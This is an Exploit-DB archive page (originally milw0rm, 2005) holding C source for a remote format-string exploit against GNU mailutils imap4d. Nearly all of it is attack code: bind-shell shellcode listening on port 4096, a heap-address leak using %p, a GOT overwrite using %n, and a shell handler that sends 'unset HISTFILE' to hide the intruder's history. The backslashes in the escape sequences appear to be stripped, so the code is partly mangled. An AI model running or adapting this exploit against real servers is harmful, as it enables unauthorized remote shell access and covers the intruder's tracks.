https://www.exploit-db.com/exploits/1038

漏洞细节尚未披露

/*
   gun-imapd.c
   """""""""""

   gnu mailutils-0.5 - < mailutils-0.6.90 remote formatstring exploit
  
   written and tested on FC3.
   this is a first testing version and the onlyone to go public.
   

   by
      [email protected]

*/




#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

// to be modified
#define  GOT  0x080573fc 

static char bindshell[]= //by pr1 bind to :4096 
"x31xc0"              //  xor    %eax,%eax
"x50"                  //  push  %eax
"x40"                  //  inc    %eax
"x89xc3"              //  mov    %eax,%ebx
"x40"                  //  inc    %eax
"x53"                  //  push  %ebx
"x50"                          //  push  %eax
"x89xe1"                      //  mov    %esp,%ecx
"xb0x66"                      //  mov    $0x66,%al
"xcdx80"              //  int    $0x80
"x31xd2"              //  xor    %edx,%edx
"x52"                  //  push  %edx
"x43"                  //  inc    %ebx
"x6ax10"              //  push  $0x10
"x66x53"              //  push  %bx
"x89xe1"                      //  mov    %esp,%ecx
"x6ax10"              //  push  $0x10
"x51"                  //  push  %ecx
"x50"                  //  push  %eax
"x89xe1"              //  mov    %esp,%ecx
"xb0x66"                      //  mov    $0x66,%al
"xcdx80"              //  int    $0x80
"xd1xe3"              //  shl    %ebx
"xb0x66"              //  mov    $0x66,%al
"xcdx80"              //  int    $0x80
"x58"                  //  pop    %eax
"x52"                          //  push  %edx
"x50"                          //  push  %eax
"x43"                          //  inc    %ebx
"x89xe1"              //  mov    %esp,%ecx
"xb0x66"              //  mov    $0x66,%al
"xcdx80"              //  int    $0x80
"x87xd9"                      //  xchg  %ebx,%ecx
"x93"                          //  xchg  %eax,%ebx
"x49"                          //  dec    %ecx
"x31xc0"                      //  xor    %eax,%eax
"x49"                          //  dec    %ecx
"xb0x3f"                      //  mov    $0x3f,%al
"xcdx80"                      //  int    $0x80
"x41"                          //  inc    %ecx
"xe2xf8"                      //  loop  8048469 <blah>
"x52"                          //  push  %edx
"x68x6ex2fx73x68"    //  push  $0x68732f6e
"x68x2fx2fx62x69"    //  push  $0x69622f2f
"x89xe3"                //  mov    %esp,%ebx
"x52"                    //  push  %edx
"x53"                    //  push  %ebx
"x89xe1"                //  mov    %esp,%ecx
"xb0x0b"                //  mov    $0xb,%al
"xcdx80"                //  int    $0x80
;


/********************************
|****** handle remoteshell ******|
********************************/

int handleshell(int peersh)
{
fd_set fds;
char buff[2048];
int ret, cntr = 1;

printf(" |- enjoy your stay and come back soon ;>n");

write(peersh, "unset HISTFILE;id;uname -a;n", 30);

while(ret && cntr)
     {
      FD_ZERO(&fds);
      FD_SET(0, &fds);
      FD_SET(peersh, &fds);
      ret = select(peersh+1, &fds, 0, 0, 0);
      if(ret) 
        {
         memset(buff, 0x0, sizeof(buff));
         if(FD_ISSET(peersh, &fds)) 
           {
            cntr = read(peersh, buff, sizeof(buff)-1); 
            printf("%s", buff);
            fflush(stdout);
            }
         if(FD_ISSET(0, &fds)) 
           {
            cntr = read(0, buff, sizeof(buff)-1);
            write(peersh, buff, strlen(buff));
           }
        }
     }  
 return 1;
}





/********************************
|********* HELP OUTPUT **********|
********************************/

void help()
{

printf(" `- usage: gun-imapd -p 143 -t www.exploits.cx  n");                
exit(0);
}



/********************************
|******* CONNECT FUNC  **********|
********************************/


int connectme(char* ip, unsigned short port)
{
int soquet;
struct sockaddr_in  remoteaddr_in;
struct hostent*     hostip;

memset(&remoteaddr_in, 0x0, sizeof(remoteaddr_in));
if ((hostip = gethostbyname(ip)) == NULL)
   {
     printf(" |- could not resolve [%s]n", ip);
     exit(-1);
   }

remoteaddr_in.sin_family = AF_INET;
remoteaddr_in.sin_port   = htons(port);
remoteaddr_in.sin_addr   = *((struct in_addr *)hostip->h_addr);

if ((soquet = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
     printf(" |- got no socket!n");
     exit(-1);
    }

printf(" |- try connecting to [%s:%d] ...", ip, port);

if (connect(soquet, (struct sockaddr *)&remoteaddr_in, sizeof(struct sockaddr)) ==  -1)
   {
    printf(" no connection, exiting!n");
    exit(-1);
   }

printf(" successfull!n");
return(soquet);
}


/********************************
|********* DO SPLOIT ************|
********************************/

int do_sploit(int soquet)
{
char buff[1024], *addr = 0;
int cntr = 0, *ptr, scaddr, gotaddr = GOT;
unsigned int w1, w2 ,w3;

//find heap with our shellcode: !experimental!
memset(buff, 0x00, sizeof(buff));
memset(buff, 0x41, 496);
strcat(buff, "111122223333%p%p%p%p[%p-%p]rn");

if(write(soquet, buff, strlen(buff)) == -1)
  {
   printf(" |- could not send packet!n");
   return -1;
  }
memset(buff, 0x00, sizeof(buff));
read(soquet, buff, sizeof(buff)-1);
addr = strstr(buff, "[");
if(addr > 0) 
  { 
   scaddr = strtoul(++addr, 0, 0) + 0x330;//the next chunk..
   printf(" |- using %pn", scaddr);
     } 
else printf(" |- !could not determine heap address..n!"); 
//k build exploit now:

 w3 = ( scaddr & 0xffff0000 ) >> 16;
 w1 = ( scaddr & 0x0000ffff );


memset(buff, 0x00, sizeof(buff));
memset(buff, 0x41, 496);
memcpy(buff+400, bindshell, strlen(bindshell));
cntr = strlen(buff) + 3*4;


ptr = (int *)gotaddr;
memcpy((buff+496), &ptr,4);
ptr = (int *)gotaddr;
memcpy((buff+500), &ptr,4);
ptr = (int *)(gotaddr+2);
memcpy((buff+504), &ptr,4);
w1 -= cntr; 
w3 += (0x10000 - w1) - cntr;
sprintf(buff+508, "%%%dp%%n%%%dp%%n rn", w1, w3);

if(write(soquet, buff, strlen(buff)) == -1)
  {
   printf(" |- could not send packet!n");
   return -1;
  }
//memset(buff, 0x00, sizeof(buff));
//read(soquet, buff, sizeof(buff));


return 1;
}

/********************************
|************* MAIN *************|
********************************/

int main(int argc, char *argv[])
{
int tmp, socke, port = 143;
char *target = 0;
char banner[32];

printf(" . gun-imapd v0.1 by qobaiashin |n");
memset(banner, 0x00, sizeof(banner));

while((tmp = getopt(argc, argv, "p:t:h")) != EOF)
     {
      switch (tmp)
             { 
              case 'p':  
                         port = atoi(optarg);
                         printf(" |- using port: %dn", port);
                         break;

              case 't':  
                         target = optarg;
                         printf(" |- target host is: %sn", optarg);
                         break;

              case 'h':  help();
              }      

      }
if (target == NULL) help();
socke = connectme(target, port);

if (read(socke, banner, sizeof(banner)) > -1)
   {
    printf(" |- remote host is a %s", (banner+4));
   } 

do_sploit(socke);
sleep(1);
tmp = connectme(target, 4096);
handleshell(tmp);

close(tmp);
close(socke);
}

// milw0rm.com [2005-06-10]